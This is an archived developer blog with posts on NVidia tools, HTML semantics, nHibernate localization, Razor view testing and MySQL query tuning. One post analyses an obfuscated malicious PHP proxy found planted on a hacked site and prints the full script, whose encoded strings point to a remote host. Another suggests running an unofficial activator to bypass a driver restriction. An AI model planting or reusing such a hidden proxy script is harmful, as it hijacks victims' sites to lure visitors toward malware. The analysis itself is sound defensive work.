How to Run NView Desktop Manager on Windows 7 x64

19 June, 2012

Click here to skip to the solution.

As pleasant as it is working with multiple big screens, the experience on Windows is often quite simple and most applications are lacking specific dual-screen features. Some get it better than others, most provide no extra support at all. In my case it is the ability to keep any application always on top that is crucial for my setup, as I stretch most apps across both screens, which often prevents me from having windows side-by-side. There are plenty of tiny utilities to keep applications always on top, but most of them are old, unsupported and don’t work with Windows 7.

So that’s where a neat little app from NVidia comes in. It is called NView and it is the best desktop manager software in existence. With NView you can:

  • Send any window to any monitor
  • Quickly organize windows across displays
  • Set any window to always stay on top
  • Adjust transparency of any application
Other features include desktop grid, extendable taskbar, desktop profiles, etc.

The bad news is that a) NView desktop manager is only available for Quadro card owners b) It can only be installed on Windows XP (and Vista if you are lucky). There is a petition on NVidia forums to port it to Windows 7, but as far as I am concerned demand isn’t big enough for developers to spend time on it.

The reality is though, that there is only one major reason why it’s not available on Windows 7 and that is one broken feature concerning desktop grid. If you are happy to live without it then read on.


So in order to get NView working on Windows 7 32-bit or 64-bit you will need:

1. A GeForce card. Sorry, we are talking about an NVidia application.

2. Windows 7 32-bit or 64-bit.

3. Download NViewActivator.

4. Download latest Quadro Drivers.

5. Run downloaded Quadro drivers installer. It will extract and fail (unless you have a Quadro card).

6. Find the folder where drivers have been extracted to and drop NViewActivator.exe there. Your folder should look like this.

7. Run NViewActivator.exe. It will open and close very quickly. This is normal.

8. Run setup.exe again, it should let you proceed as normal. If you have done everything correctly after installation your screen will look similar to this.

9. Enjoy! To access NView features just right click on any window's title.

I couldn't get all features to work, but most do and that is good enough for me. I sincerely hope this was helpful.

Permanent Link

My Blog Has Received a Little Face Lift

28 February, 2012

This blog has never had any sort of professional design (or what I would call "design") to begin with, which is not necessarily an issue by itself, but I always felt annoyed by the chaotic clumsiness of it:

  • Font-face javascript took a whole second to load and then another portion to re-render half the page, which was very irritating.
  • Blocks did not align with each other and the layout.
  • Droid Sans turned out to be a great font for interface, and a horrible font for screen reading.
  • Links used a color scheme that was screaming at you "Hey! I'm from the 90's."

There were other things not worth mentioning. It was time to take action, and so I did. Here are the obligatory before and after pictures.



I have also added Recent Articles block to the left column for easier navigation. Please enjoy!

Permanent Link

Is b tag Deprecated?

21 February, 2012

I often see on the Internet claims by self-proclaimed W3C Standards pundits that tag <b> is deprecated, invalid, evil and should be replaced by <strong> everywhere possible and not. This claim is often supported by non-direct reference to W3C HTML Standard. There is never a direct link however.

There is one simple reason for this, of course: tag <b> has never been deprecated or deemed invalid, or non-semantic. In fact, tag <b> is in the "Text-level semantics" section of W3C Recommendations for HTML 5. Lets look at what is percieved as HTML Standard today.

Here is what HTML 4.01 Recommendations document says about b in "Fonts" section:

Rendering of font style elements depends on the user agent. The following is an informative description only.
B: Renders as bold text style.
Font style elements must be properly nested. Rendering of nested font style elements depends on the user agent.
Interestingly enough the name "B" is surrounded by the <b> tag itself.

HTML 4 description of the tag is not descriptive enough, and HTML 5 Standard clarifies its usage much better:

The b element represents a span of text to which attention is being drawn for utilitarian purposes without conveying any extra importance and with no implication of an alternate voice or mood, such as key words in a document abstract, product names in a review, actionable words in interactive text-driven software, or an article lede.

Knowing this you still wouldn't be too far off claiming that a particular usage of the tag is invalid, because there are very few practical cases where <b> is valid:

The b element should be used as a last resort when no other element is more appropriate. In particular, headings should use the h1 to h6 elements, stress emphasis should use the em element, importance should be denoted with the strong element, and text marked or highlighted should use the mark element.

The problem is especially tricky in WYSIWYG editors, that allow you to make a piece of text bold. Which tag should they pick for this purpose? <strong> is not valid if you want to highlight a company name or most other names, but would be mostly correct in literaly works. How would, for instance, a content management system know which meaning a piece of text has? Should it provide 2 buttons? Or even 3 buttons if you include emphasis. That would be extremelly confusing to non-technical users, and although helpful to machines and visitors with disabilities, practically useless for a typical website.

Regardless of semantic meaning they can all be restyled through CSS, which makes usage of either of them purely for display purposes completely invalid, and for this reason perhaps WYSIWYG editors should just use a styled <span> tag.

In any case the point I am trying to make here is simply that tag <b> is not deprecated or invalid, and should and can still be used, and has as much semantic meaning as its <strong> counterpart.

Permanent Link

Save the Internet from SOPA petition

07 December, 2011

A reminder to everyone concerned about the future of free and open Internet to sign online petition, that will be used in congressional hearings to defend against heavily-lobbied SOPA legislation. Currently sitting at 979,692 signatures, it will hopefully reach 1,500,000 by the end of the week.

This should concern everyone, wherever you live, not just US citizen, since the effect (and the ban hammer the law will introduce) will reach virtually everyone actively engaged with user-submitted content platforms.

Permanent Link

Dual Monitor Power-Saving Mode (Nvidia cards) Fix

30 November, 2011

If you, like myself, is one of the developers working with dual monitors on an Nvidia card, you might have noticed increased power consumption and temperature of the video card. The problem is quite common with Nvidia desktop cards, as there is no power-savings mode built in for dual monitor mode. The card will simply stay in 3D high performance mode all the time, never reverting back to 2D as it normally would, while idling. This has even been addressed in one of the driver's updates:

This is a hardware limitation and not a software bug. Even when no 3D programs are running, the driver will operate the GPU at a high performance level in order to efficiently drive multiple displays. In the case of SLI or multi‐GPU PCs, the second GPU will always operate with full clock speeds; again, in order to efficiently drive multiple displays. Today, all hardware from all GPU vendors have this limitation.

Fortunatelly, there is a software workaround, that does the magic.


1. Download and install Nvidia Inspector Tool (normally used for smart overclocking).

2. Right-click on "Show Overclocking" and select "Start Multi Display Power Saver".

Nvidia inspector dual monitor fix

3. Select the card that you want to fix.

4. Check "Run Multi Display Power Saver at Windows Startup".

Nvidia dual monitor power saving fix

5. Optionally add applications you want to exclude from power saving mode and/or enable performance mode when a threshold is met, with P0 being the most performant state and P8 being one of the slower states.

The way it works is quite simple: this application will force the video card into the slowest performing state (effectively downclocking it), which in my case is just 51 Mhz GPU clock. It may also result in the card dropping voltage.

My temperature before applying the fix (idle): 80C.
Temperature after applying the fix (idle): 48C.

Plus, it almost halved the card's power consumption.

Permanent Link

Uncovering Hackers' Satellite Network

24 November, 2011

Recently I have discovered a traffic spike on one of my old friend's website. The top content URLs were very suspiciously looking for a PHP site: /aspnet_client/{x}/{y}. When put in a browser those URLs produced a whole new website. My first thought was that hackers hosted their website on my friend's server for free. But quick directory browsing revealed that "aspnet_client" folder contained just one file "index.php" and nothing else. The content of the file was:

<? $GLOBALS['_1546482439_']=Array(base64_decode('Y3Vyb' .'F9' .'pbml0'),base64_decode('Y3' .'VybF9zZ' .'XR' .'vc' .'HQ='),base64_decode('' .'Y3Vy' .'bF9zZX' .'Rvc' .'HQ' .'='),base64_decode('Y3VybF' .'9le' .'GV' .'j'),base64_decode('Y3Vyb' .'F9j' .'bG' .'9zZQ' .'=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('aGV' .'hZ' .'GVy'),base64_decode('c3Ryc3R' .'y'),base64_decode('aGV' .'hZG' .'Vy'),base64_decode('' .'c3' .'Ryc3Ry'),base64_decode('' .'c3R' .'y' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('c3R' .'yc3R' .'y'),base64_decode('' .'a' .'G' .'VhZGVy'),base64_decode('aG' .'VhZG' .'V' .'y')); ?><? function _1161828149($i){$a=Array('aWQ=','aHR0cDovLzE4OC4xNDMuMjMyLjEzMS9qb2svYTYv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? $_0=$_REQUEST[_1161828149(0)];$_1=$GLOBALS['_1546482439_'][0]();$_2=_1161828149(1) .$_0;$GLOBALS['_1546482439_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_1546482439_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_1546482439_'][3]($_1);$GLOBALS['_1546482439_'][4]($_1);if($GLOBALS['_1546482439_'][5]($_0,_1161828149(2))){$GLOBALS['_1546482439_'][6](_1161828149(3));}elseif($GLOBALS['_1546482439_'][7]($_0,_1161828149(4))){$GLOBALS['_1546482439_'][8](_1161828149(5));}elseif($GLOBALS['_1546482439_'][9]($_0,_1161828149(6))|| $GLOBALS['_1546482439_'][10]($_0,_1161828149(7))){$GLOBALS['_1546482439_'][11](_1161828149(8));}elseif($GLOBALS['_1546482439_'][12]($_0,_1161828149(9))){$GLOBALS['_1546482439_'][13](_1161828149(10));}else{$GLOBALS['_1546482439_'][14](_1161828149(11));}echo $_3; ?>

So that looks like a typical malicious PHP script. But what does it really do? Well, since it's PHP the source code is right there, just the obfuscated version of it. There are few tools that can decode base64 encoded strings quite easily. Decoding all the encoded strings produced a curious list, giving enough clues to figure out the intentions:

Content-Type: text/css; charset=windows-1251
Content-Type: image/png
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: text/html; charset=windows-1251

Effectively the script was using CURL to download some other website and present it under victim's domain name. Now that's something I haven't seen before. Why would anyone do something like that?

It turned out the malicious website hosts links to another website disguised as links to pirated educational materials, which in turn hosts malicious software under the same pretence.

But that doesn't answer the question why. Quick investigation revealed hundreds of websites hacked in a similar manner, with slightly different pages hosted on them, but all leading to the same file hosting domain in the end.

Effectively, these hackers built a network of satellite websites, each of which grabbing a portion of search traffic and leading users into a pit full of digital fire. Having built such a massive network, the possibilities are endless, with most obvious use in areas of SEO.

Query with the hosting company revealed that the initial script was planted through a bug in an old phpMyAdmin installation, that has been laying around untouched since 2005. Doh! Those were the days, where hosting companies did not bother to package software for you and only gave out MySQL and FTP passwords, and the rest was up to you to figure out. Oh, and you couldn't put files outside of the public directory. Fun times.

Permanent Link

Internationalization with nHibernate

28 April, 2011

For many years I have been trying to come up with a solution that would allow me to attach textual data to my database objects that is queried based on current culture. The solution I am going to demonstrate here can be a little hard to comprehend at first, but is very easy to use, and with a proper nHibernate backed database will allow rapid development of origin based data storage.

Mind you that all of our database is built from mappings, so once we add locale data to an object we automatically create the appropriate table, so developers truly never have to worry about the backing storage solution, as long as nHibernate supports it. We are also using sharpArchitecture, so you will see some references to it in the code.

OK, so let's start with interfaces. First we need an object that will store our data. As it has a many-to-one relationship with the parent we can define the following:

public interface ILocaleStorage<TParent, TLocaleId> : IEntityWithTypedId<TLocaleId>
	int Culture { get; set; }
	DateTime Updated { get; set; }
	TParent Parent { get; set; }

This is just an interface for entities with added Culture, last updated time and reference to the parent (must have that for proper nHibernate support).

Next interface is the parent entity, so essentialy it just ensures that our parent has indeed reference to the locale storage.

Note: IEntityWithTypedId<T> is from sharpArchitecture.

public interface IEntityWithLocaleStorage<TLocale, TId> : IEntityWithTypedId<TId>
	IList<TLocale> Locale { get; set; }

Now we need a base implementation for LocaleStorage<,> interface which other entities can use (not really necessary but saves some lines of codes).

public class LocaleStorage<TParent, TLocaleId> : EntityWithTypedId<TLocaleId>, ILocaleStorage<TParent, TLocaleId>
	public virtual int Culture { get; set; }
	public virtual DateTime Updated { get; set; }
	public virtual TParent Parent { get; set; }

Most of the magic happens in the next definition, which is a base implementation for IEntityWithLocaleStorage<,> interface. This can be hard to understand if you are not very familiar with generics.

public class EntityWithLocaleStorage<T, TLocale, TId, TLocaleId> : EntityWithTypedId<TId>,
        IEntityWithLocaleStorage<TLocale, TId>
        where TLocale : class, ILocaleStorage<T, TLocaleId>, new()
        where T : EntityWithLocaleStorage<T, TLocale, TId, TLocaleId>

What's going on here? Going type-by-type first:
T - type that is going to inherit from EntityWithLocaleStorage<,,,>, same as this.GetType(), hence self-referencing type constraint
TLocale - type that implements ILocaleStorage<,>, so this is where your culture based data is stored
TId - type of the id of T
TLocaleId - type of the id of TLocale

So far there is no use to any of those monstrosities, let's add one. First, add basic constructor to initialize one-to-many collection.

public virtual IList<TLocale> Locale { get; set; }
public EntityWithLocaleStorage()
	: base()
	Locale = new List<TLocale>();

Second, provide a mechanism for inheriting classes to correctly retrieve objects from the store.

protected TLocale GetLocale(bool setter)
	if (Locale.Count == 1 
		&& (!setter || Thread.CurrentThread.CurrentCulture.LCID == Locale[0].Culture))
		return Locale[0];
	if (Locale.Count > 1)
		var result = Locale.Where(x => x.Culture == Thread.CurrentThread.CurrentCulture.LCID).FirstOrDefault();
		if (result != null)
			return result;

	if (Locale.Count == 0)
		Locale.Add(new TLocale { Culture = 1033, Parent = (T)this });
	else if (setter)
		Locale.Add(new TLocale { Culture = Thread.CurrentThread.CurrentCulture.LCID, Parent = (T)this });
		return Locale.Where(x => x.Culture == 1033).FirstOrDefault();

	return GetLocale(setter);

As you can see GetLocale(bool) will return data associated with the default locale if there is only one in the database and you don't want to create a new one. If there is more than one it will go ahead and find the row with the corresponding culture code. If that doesn't work data for the current culture code will automatically be added to the database and returned, or simply the first element will be returned. Parameter "setter" is there to prevent locale data being created when you don't want to.

Now to real world examples.

public class Profile : EntityWithLocaleStorage<Profile, ProfileLocale, int, int>
	public Profile()
		: base()

	public virtual string Biography
		get { return GetLocale(false).Biography; }
		set { GetLocale(true).Biography = value; }

	public virtual string AuthorName
		get { return GetLocale(false).AuthorName; }
		set { GetLocale(true).AuthorName = value; }

public class ProfileLocale : LocaleStorage<Profile, int>
	public virtual string Biography { get; set; }
	public virtual string AuthorName { get; set; }

Note: [IgnoreDuringDatabaseMapping] ensures that those properties are not picked up by Fluent nHibernate. Also notice how setters have "setter" parameter set to true, and getter to false? This ensures that users see either their culture (if there is data) or default, but can never create an empty row just by requesting a page.

After that is set up all that's left is few Fluent mapping overrides. We also allow wiki-style versioning for our locales so our mappings include that as well.

public class ProfileMap : IAutoMappingOverride<Profile>
	public void Override(AutoMapping<Profile> mapping)
		mapping.HasMany(x => x.Locale).Inverse()
			.OrderBy("Updated DESC")

 public class ProfileLocaleMap : IAutoMappingOverride<ProfileLocale>
	public void Override(AutoMapping<ProfileLocale> mapping)
		mapping.References(x => x.Parent);
		mapping.Map(x => x.Culture);
		mapping.Version(x => x.Updated).CustomSqlType("timestamp").Generated.Never();
		mapping.CompositeId().KeyProperty(x => x.Parent, "parent_id").KeyProperty(x => x.Culture, "culture");

		mapping.Map(x => x.Biography).CustomSqlType("TEXT");

Another magical part here is .ApplyFilter<CultureFilter>(), which is an nHibernate filter. Note: refer to this blog post if you are getting an exception about filter-def not being used anywhere.

public class CultureFilter : FilterDefinition
	public CultureFilter()
		WithName("CultureFilter").WithCondition("(:Culture = Culture OR 1033 = Culture)").AddParameter("Culture", NHibernateUtil.Int32);

Note: 1033 is LCID of en-US culture. This filter effectively limits collection to two elements: the ones corresponding to current and default culture. Code above should work without the filter too.

This filter can be enabled like so:

NHibernateSession.Current.EnableFilter("CultureFilter").SetParameter("Culture", Thread.CurrentThread.CurrentCulture.LCID);

That's it. Profile object now has culture based data attached to it, which can be used by calling simple Profile.Biography. Data will be retrieved based on either current or default en-US culture. If you then choose to edit data it will always be saved to your current culture, even if previously there was no corresponding row in the database.

I hope my little article helps developers working with nHibernate and struggling with i18n designs.

Permanent Link

Why Australian Unis Will Not Teach You How To Program

07 April, 2011

Undergraduate education is highly standardized in every country and follows same patterns over and over. The format has hardly changed in many years. Well, except maybe it got a little less mundane with new technology, with downloadable lecture notes and videos. And it still works for most professions out there, as they say "university teaches you how to educate yourself" (although to be fair no one ever teaches you how to do exactly that, they just throw everyone out "in the wild" and ask questions later). It works for some degree in CompSci theory department too, but when it comes to application the education system crumbles.

I don't mean programming in its simplest form here (aka "coding") - that can surely be self-taught. Applying theoretical knowledge is a missing skill, there is just no methodology to go from abstract concepts, so overwhelmingly poured in your head at uni, to that piece of legacy CRM system you are desperately trying to improve.

It is only after going through a million of similar problems and acquiring years of experience, and then rediscovering things that you were already once taught, that you can make a connection between what you have once learned and the problem at hand.

What are you usually taught at uni? You learn some theory, then you learn a programming language and how to code simple things, then you keep learning theory, and you keep learning how to code slightly less simple things (if you are lucky you will have a class with a combination of both). And then you graduate after taking 24 classes, of which half were there just to fill the gaps.

How are the classes ran? Well, you have a lecture, followed by a tutorial, followed by a practical, followed by an assignment or two. The former implying usage of bits of material learned previously in the course. There is no problem identification and resolution in that. You are always guaranteed to know that the solution is in the textbook and at some very close point in the past you have seen it. In real life that point in the past will be very far away, and you need an absolutely inhuman brain capacity to recover that knowledge in the right moment.

However, if you change that structure to the opposite, if you learn how to code first (for which you don't even need to know what a computer is), then you try to implement complex projects and ultimately fail, it is only at that point that theory and science can come in and provide the missing pieces that you were lacking, but never knew existed. This way problems are presented before solutions, just like it is in the real world.

How do we learn when we really want to learn something? We read and practice at the same time, we come up with things to do with our newly acquired knowledge - we don't just shelve it in hopes of using it later, we use it straight away in a manner we sit fit for ourselves. You cannot just come up with a project to do and do it at uni. Why not? Grades. It is downright impossible to grade pet projects, since there are no set requirements (which would destroy the whole idea of having a project to practice on) and no marking criteria.

But why are there grades at Uni in the first place? Who are the people that really need artificial works of learning students to be graded? Do grades indicate the learning progress? Nope, they only indicate your ability to, well, acquire good grades. There is no practical feedback in grades, so students don't need them. Unis need grades for one major reason: demonstrable quality of their education. It's something to show to employers. Hey, we fail people who don't do anything, and we reward people who do exactly what they are told. Will they fail in a non-supervised environment? No one can ever tell. Even employers don't look at grades. How many of you had to present their grades to an employer? I bet the number is close to 0. Americans just show off their average grades, a 100% useless statistic.

It's a shame. Most good things that students do do at unis come out of off-hours projects, with no grades, almost no supervision and no hard-set plan. Australian unis rarely often something like that. Oh, you can go to the gym, that's included though.

Honestly, I have no solution for this. Just ditching grading altogether will not magically work, and changing educational plans requires titanic effort. But if you do want to leave uni with something - play with every bit of knowledge you get there. Those boring sorting algorithms - sort all files on your PC, you have a hundred thousand of those. Learned about a dozen path finding algorithms - write a game. Run pet projects, collaborate, ask around - you'll need it all as some point. Studying for assignments and tests is only great if you want to train your short-term memory.

Permanent Link Permanent Link

Unit Testing Razor Views

08 March, 2011

When ASP .Net MVC 3 new Razor view engine was first announced it was presented as being unit testable (to the extent views can be unit testable at all), however there is still no sensible guide as to how to actually achieve that. It is unclear to me what the way intended by the MVC team is, so I had to create my own set of helper methods to test my views, or to better put it - render them without a running web server. The task wasn't easy and frankly doesn't make much sense since there is no thoughtful background to it, just a lot of diging inside of MVC 3 sources.

How to use it

Using the helper is dead easy in most cases: all you have to do is specify the type of your model, the model object itself and the path to your view.

string result = RazorHelper<Client>
		.GenerateAndExecuteTemplate(@"..\..\..\..\..\app\Northwind.Web\Views\Client\Profile.cshtml", client);

The helper will compile the template, insert the model and run it, returning the result as a string. All partial views and layout will be ignored (since we are unit testing).

GenerateAndExecuteTemplate method comes in 3 overloads:

public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model)
public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model, HttpContextBase httpContext)
public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model, HttpContextBase httpContext, Action<WebViewPage<T>> modifyViewBag)

The former two allow you to insert a mocked HttpContextBase and/or modify ViewBag of the resulting page before execution. This can be useful in cases where your views step out of your model, or are completely modelless (in which case just specify object for type T). One thing to remember is that your view must make use of @model keyword or the templating engine will not be able to determine the model type.

Source Code

Feel free to modify and use the source however you want. I very much doubt that I will keep using it long enough myself, since testability of Razor views was an announced feature of MVC 3 and we are likely to see official examples in the next couple of months.

public class RazorViewExecutionResult
	public string Text { get; set; }
	public IList<string> SectionNames { get; private set; }

	public RazorViewExecutionResult()
		SectionNames = new List<string>();

public static class RazorHelper<T>
	public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model)
		return GenerateAndExecuteTemplate(templateName, model, null, null);

	public static RazorViewExecutionResult GenerateAndExecuteTemplate
		(string templateName, T model, HttpContextBase httpContext)
		return GenerateAndExecuteTemplate(templateName, model, httpContext, null);

	public static RazorViewExecutionResult GenerateAndExecuteTemplate
		(string templateName, T model, HttpContextBase httpContext, Action<WebViewPage<T>> modifyViewBag)
		string view = File.ReadAllText(templateName);
		var template = RazorHelper<T>.GenerateTemplate(view);
		if (modifyViewBag != null)
		var result = RazorHelper<T>.ExecuteTemplate(template, model, httpContext);
		return result;

	private static RazorTemplateEngine SetupRazorEngine()
		// Set up the hosting environment (filename here is only used to trick RazorTemplateEngine)
		var host = new MvcWebPageRazorHost("~/test.cshtml", System.Environment.CurrentDirectory);
		// TODO: add your namespaces here
		// Create the template engine using this host
		return new RazorTemplateEngine(host);

	public static RazorViewExecutionResult ExecuteTemplate(WebViewPage<T> viewPage, T model)
		return ExecuteTemplate(viewPage, model, null);

	public static RazorViewExecutionResult ExecuteTemplate(WebViewPage<T> viewPage, T model, HttpContextBase httpContext)
		var result = new RazorViewExecutionResult();
		// Warning: lots of mocking below

		// mock HTTP state objects
		var context = MockRepository.GenerateMock<HttpContextBase>();
		context.Expect(x => x.Items).Return(new Dictionary<object, object>());
		var response = MockRepository.GenerateMock<HttpResponseBase>();
		response.Expect(x => x.ApplyAppPathModifier("")).IgnoreArguments().Repeat.Any()
			.WhenCalled(x => { x.ReturnValue = x.Arguments[0]; });
		context.Expect(x => x.Response).Repeat.Any().Return(response);
		var request = MockRepository.GenerateMock<HttpRequestBase>();
		context.Expect(x => x.Request).Repeat.Any().Return(request);
		request.Expect(x => x.ApplicationPath).Repeat.Any().Return("/");
		request.Expect(x => x.IsLocal).Repeat.Any().Return(true);
		var requestRouteContext = new RequestContext(context, new RouteData());
		// mock page view context
		var view = MockRepository.GenerateMock<ViewContext>();
		var mock = new MockRepository();
		view.Expect(x => x.HttpContext).Repeat.Any().Return(context);
		var viewMock = MockRepository.GenerateMock<IView>();
		view.Expect(x => x.View).Repeat.Any().Return(viewMock);
		view.Expect(x => x.TempData).Repeat.Any().Return(new TempDataDictionary());
		view.Expect(x => x.ViewData).Repeat.Any().Return(new ViewDataDictionary<T>(model));
		var viewDataContainer = MockRepository.GenerateMock<IViewDataContainer>();
		// mock view data used by the page
		viewDataContainer.Expect(c => c.ViewData).Repeat.Any().Return(new ViewDataDictionary<T>(model));
		// mock html helper
		var html = mock.DynamicMock<HtmlHelper<T>>(view, viewDataContainer);
		var urlHelper = MockRepository.GenerateMock<UrlHelper>(requestRouteContext);
		// mock viewengine (for partial views fake resolution)
		var viewEngine = MockRepository.GenerateMock<IViewEngine>();
		viewEngine.Expect(x => x.FindPartialView(null, null, false)).IgnoreArguments()
			.Repeat.Any().Return(new ViewEngineResult(viewMock, viewEngine));

		using (var tw = new StringWriter())
		using (var twNull = new StringWriter()) // this writer is used to discard unnecessary results
			view.Expect(x => x.Writer).Repeat.Any().Return(tw);

			// inject mocked context
			viewPage.Context = httpContext;

			var pageContext = new WebPageContext(context: context, page: null, model: null);
			viewPage.ViewContext = view;
			if (model != null)
				viewPage.ViewData = new ViewDataDictionary<T>(model);
			viewPage.Html = html;
			viewPage.Url = urlHelper;
			// insert mocked viewEngine for fake partial views resolution

			// prepare view for execution, discard all generated results
			viewPage.PushContext(pageContext, twNull);
			viewPage.ExecutePageHierarchy(pageContext, twNull);
			// inject textwriter
			// execute compiled page

			// find all sections and render them too
			PropertyInfo dynMethod = pageContext.GetType().GetProperty("SectionWritersStack", BindingFlags.NonPublic | BindingFlags.Instance);
			var res = (Stack<Dictionary<string, SectionWriter>>)dynMethod.GetValue(pageContext, null);
			foreach (var section in res.Peek())

			result.Text = tw.ToString();
			return result;

	public static WebViewPage<T> GenerateTemplate(string input)
		WebViewPage<T> result = null;
		var _engine = SetupRazorEngine();

		// Generate code for the template
		GeneratorResults razorResult = null;
		Regex layout = new Regex("Layout = .*");
		input = layout.Replace(input, string.Empty); // layouts cannot be rendered in unit test environment
		using (TextReader rdr = new StringReader(input))
			razorResult = _engine.GenerateCode(rdr);

		var codeProvider = new CSharpCodeProvider();

		// generate C# code
		using (var sw = new StringWriter())
			codeProvider.GenerateCodeFromCompileUnit(razorResult.GeneratedCode, sw, new CodeGeneratorOptions());

		var compParams = new CompilerParameters(new string[] {
				typeof(RazorHelper<>).Assembly.CodeBase.Replace("file:///", "").Replace("/", "\\")
		compParams.GenerateInMemory = true;
		// TODO: add your assemblies here
		compParams.IncludeDebugInformation = true;

		// Compile the generated code into an assembly
		CompilerResults results = codeProvider.CompileAssemblyFromDom(

		if (results.Errors.HasErrors)
			CompilerError err = results.Errors
									   .Where(ce => !ce.IsWarning)
			throw new HttpCompileException(String.Format("Error Compiling Template: ({0}, {1}) {2}",
										  err.Line, err.Column, err.ErrorText));
			// Load the assembly
			Assembly asm = results.CompiledAssembly;
			if (asm == null)
				throw new HttpCompileException("Error loading template assembly");
				// Get the template type
				Type typ = asm.GetType("ASP._Page_test_cshtml"); // remember the fake filename?
				if (typ == null)
					throw new HttpCompileException(string.Format("Could not find type ASP._Page_test_cshtml in assembly {0}", asm.FullName));
					result = Activator.CreateInstance(typ) as WebViewPage<T>;
					if (result == null)
						throw new HttpCompileException("Could not construct RazorOutput.Template or it does not inherit from ASP._Page_test_cshtml");

		return result;
Permanent Link

Localizing Fluent NHibernate, Workaround for filter-def Exception

02 April, 2010

Update: this bug has since been fixed, although my bug report was originally dismissed (only to be raised again by Ayende), so much for open in open source. Oh well. Meanwhile I have come up with a better solution for i18n available in my blog post here.

For those of you trying to use localization with nHibernate as suggested by Ayende Rahien and getting an nHibernate exception:

filter-def for filter named 'CultureFilter' was never used to filter classes nor collections.

The solution is obvious: use it to filter a class or a collection. If you are using Fluent nHibernate like I am, just put in something like this:

public class CultureFilter : FilterDefinition 
    public CultureFilter() 
        WithName("CultureFilter").WithCondition("Id > 0").AddParameter("Culture", NHibernateUtil.Int32); 

And then apply it to any mapping:


The best way is to put that in your HasMany collection anywhere in your mappings. The SQL then can be used normally in Map(..).Formula("");

There is a much better i18n alternative solution though, which I will write about later.

Permanent Link

Optimizing Geo IP Search with BETWEEN in MySQL

12 March, 2010

One of the projects I've been working on had a serious performance issue, when one page would take at least 600 ms to load. Which resulted in the website being completely unresponsive if 4 or more requests were made in 1 second. Quick code review (the website was written in PHP using Smarty) revealed one function causing most of the trouble. The function did a pretty simple thing: determined the visitor's city based on his IP address. When I looked closer I've came across this query:

SELECT b.*, r.reg_center
FROM counter_cities AS b LEFT JOIN regions AS r 
WHERE (1040552673 BETWEEN b.first_long_ip AND b.last_long_ip) 

Now, id and (first_long_ip, last_long_ip) are the indexes, just as recommended by MySQL docs. So the query was very fast for some ip addresses. Unfortunately, the same query took almost 600 ms when the address was not in the table, or if it was closer to the end of the table. The full table scan was being performed.


Let's try to understand what is going on here:

ORDER BY /* executed first almost immediately */
LEFT JOIN /* can be ignored from performance point of view */
WHERE ... BETWEEN /* is using the indexed key, so should be taking no time at all (or so I thought) */
LIMIT 1 /* is pulling the first result from the result set */

Well, the intentions of the developer were quite honest and the query would have been using indexes from his point of view. But in reality ORDER BY DESC LIMIT 1 forces MySQL to apply WHERE clause only to 1 row at a time, making the condition useless. It can be seen as "rows" column goes down to "2" and "filtered" goes up to a huge number (which doesn't make sense, unless you consider that it is actually a sum of the percentages of the rows filtered on each application of the condition).

So there are a lot of possible ways to optimize this query. Now that we know that ORDER BY LIMIT affects how the result is actually found, we can do the simpliest thing and rewrite it as:

FROM counter_cities AS b  
WHERE 2580423488 >= b.first_long_ip AND 2580423488 <= b.last_long_ip 
) AS c 

This query will run in 40-50 ms for any address, in or outside of the table.

Faster, we need to go faster!

But we can go further and use our indexes to the fullest extent. If we assume that ORDER BY is executed before everything else, then we can help MySQL greatly by doing the following:

FROM counter_cities
WHERE (3647675904 BETWEEN first_long_ip AND last_long_ip) 
ORDER BY first_long_ip DESC 

This query will run in <1 ms with any ip address that is in the range of our table. The downside here is that ip addresses outside of this range will require a full table scan, which is unacceptable for a local website.

Extreme solution

HANDLER counter_cities OPEN AS a; 
HANDLER a READ a.long_ip <= (3647675904); 

Where long_ip is the name of key (first_long_ip, last_long_ip). If we order the table BY id DESC, first_long_ip DESC, then the result is guranteed to be equal to our original query. Now if X is not in the range of the table, we just have to check that last_long_ip is greater than X, if it's not, than X is definitely outside of the range and we don't need to look any further. This is not very elegant though, and you will have to resort the table on each insert or update. But this query will be extremely fast in all cases.

Real-world conclusion

Unfortunately, none of these (and some other) optimized queries were put on the server, due to the developer in charge being so incompetent, that he would test the queries on the production server (yep, the same server executing 600 ms long queries every few seconds) and then base his decision on the results. Of course, the results were as good as completely random.

Permanent Link